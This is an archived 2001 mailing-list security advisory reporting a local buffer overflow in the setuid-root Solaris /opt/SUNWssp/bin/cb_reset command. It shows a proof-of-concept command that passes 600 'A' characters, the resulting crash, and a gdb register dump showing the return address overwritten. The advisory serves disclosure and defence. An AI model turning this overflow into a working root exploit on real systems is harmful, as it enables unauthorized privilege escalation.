OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Pablo Sor (psorafip.gov.ar)
Date: Wed Jun 20 2001 - 11:30:59 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Vulnerability in Solaris /opt/SUNWssp/bin/cb_reset

    Date Published: June 12, 2001

    Advisory ID: N/A

    Bugtraq ID: N/A

    CVE CAN: Non currently assigned.

    Title: Solaris /opt/SUNWssp/bin/cb_reset Buffer Overflow Vulnerability

    Class: Boundary Error Condition

    Remotely Exploitable: No

    Locally Exploitable: Yes

    Vulnerability Description:

    A problem with the cb_reset setuid root command included in the SUNWssp package
    (not in the standard install), results in a buffer overflow and potentially
    the execution of arbitraty code.
    Due to the insufficient handling of input parameter, a buffer overflow at 600
    characters makes it possible to overwrite variables on the stack including
    the return address.

    Vulnerable Packages/Systems:

    SunOS 5.8 (have not tested on other version)

    Solution/Vendor Information/Workaround:

    Sun Microsystems was notified on June 12, 2001. Patches are excepted shortly.

    Credits:

    This vulnerability was discovered by Pablo Sor, Buenos Aires, Argentina.

    This advisory was drafted with the help of the SecurityFocus.com Vulnerability
    Help Team. For more information or assistance drafting advisories please mail
    vulnhelpsecurityfocus.com.

    Technical Description :

    $ uname -a
    SunOS laika 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-5_10

    $ ls /tftpboot/cb_port
    /tftpboot/cb_port

    $ /opt/SUNWssp/bin/cb_reset `perl -e 'print "A"x600'`
    Resetting host
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
    ether_hostton(SrcHost:laika): No such file or directory
    ether_hostton(DstHost:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
    AAAAAAAAAAAAA): No such file or directory
    Bus Error (core dumped)

    $ gdb /opt/SUNWssp/bin/cb_reset --core=core
    Copyright 2000 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.8"...
    (no debugging symbols found)...
    Core was generated by `/opt/SUNWssp/bin/cb_reset
    AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 10, Bus Error.
    Reading symbols from /opt/SUNWssp/lib/libSspFileAccess.so...
    (no debugging symbols found)...done.
    Loaded symbols for /opt/SUNWssp/lib/libSspFileAccess.so
    Reading symbols from /opt/SUNWssp/lib/liblogger.so...
    (no debugging symbols found)...done.

    [...]

    Loaded symbols for /usr/lib/nss_files.so.1
    #0 0x1219c in cb_send_frame ()
    (gdb) info registers
    g0 0x0 0
    g1 0xff195b80 -15115392
    g2 0xff322630 -13490640
    g3 0xff332d78 -13423240
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x0 0
    o0 0x13278 78456
    o1 0xff1bbab8 -14959944
    o2 0xff1b8018 -14974952
    o3 0x13278 78456
    o4 0x13258 78424
    o5 0xffbedb71 -4269199
    sp 0xffbedb18 -4269288
    o7 0x1218c 74124
    l0 0xc3c3c3c3 -1010580541
    l1 0x41414141 1094795585
    l2 0x41414141 1094795585
    l3 0x41414141 1094795585
    l4 0x41414141 1094795585
    l5 0x41414141 1094795585
    l6 0x41414141 1094795585
    l7 0x41414141 1094795585
    i0 0x41414141 1094795585
    i1 0x41414141 1094795585
    i2 0x41414141 1094795585
    i3 0x41414141 1094795585
    i4 0x4141414d 1094795597
    i5 0x41414141 1094795585
    fp 0x41414141 1094795585
    i7 0x41414141 1094795585 (***)
    y 0xb 11
    psr 0xfe801001 -25161727
    wim 0x0 0
    tbr 0x0 0
    pc 0x1219c 74140
    npc 0x121a0 74144
    fpsr 0x0 0
    cpsr 0x0 0
    (gdb) 

    -- 
Pablo Sor
psorafip.gov.ar, psorccc.uba.ar